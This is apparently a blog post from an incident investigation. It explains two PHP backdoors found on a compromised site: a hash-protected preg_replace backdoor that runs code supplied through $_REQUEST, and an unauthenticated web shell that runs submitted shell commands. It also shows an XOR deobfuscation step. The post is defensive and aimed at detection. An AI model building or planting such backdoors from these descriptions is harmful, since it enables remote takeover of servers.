:PHP Obfuscation and Backdoors – Part 2:
On to the backdoors. There are many different types out there but here are a few that were encountered during the investigation.
More preg_replace goodness;
We found the caret again and used php to get the hidden gems inside. If you are looking to do this yourself instead of trying to find tools to do this for you, install php and then run “php -a” from your shell. From the php prompt you can run the following:
php > $code = “c4uUf”^”P\x1929”;print $code;
This should give the output of 3-Gl which is the XORd data from $code. Back to the backdoors! Printing out the data from preg_replace gives us the information below.
Looking into isset a bit suggests that all it will return is a true or false. This tells us that the first part of this code is making sure that ch is defined, php_code is defined and that the hash that is hardcoded (which has been removed from the image) matches the hash of whatever is in ch. We can probably assume that this is the password for the backdoor which is then verified. If a false is returned from any of the isset functions, the backdoor will fail and not move forward with requested actions.
Speaking of requests, back to php.net to take a look at what $_REQUEST is. A note from the link mentions that $_REQUEST can’t be trusted. It states that the variables are presented in either cookies or a get/post. The owner of the backdoor was able to remotely present the data for ch and php_code which would then pass or fail the isset tests and, if successful, execute any code requested.
The second backdoor is a bit more blatant and open to the world. When grepping for cmd, we found a file which contained multiple references.
This specific backdoor was dropped on the system within about a years time so this compromise was a tad more recent. When viewing this page from the outside, all you are presented with is a text box and a “Go” button. The code here really explains itself as to what it’s accomplishing. Using netstat for example will make a post request to the server and attempt to run the netstat in the command line. Your data will then be returned on the page via the if statement at the end of the code. This backdoor doesn’t have any authentication behind it and was available for use from anyone.
We hope that the information here will help you search for and identify malicious code in your environment as well as have a better understanding as to what the code may be doing. If there are any questions I could answer, please leave a comment or contact me directly at email@example.com.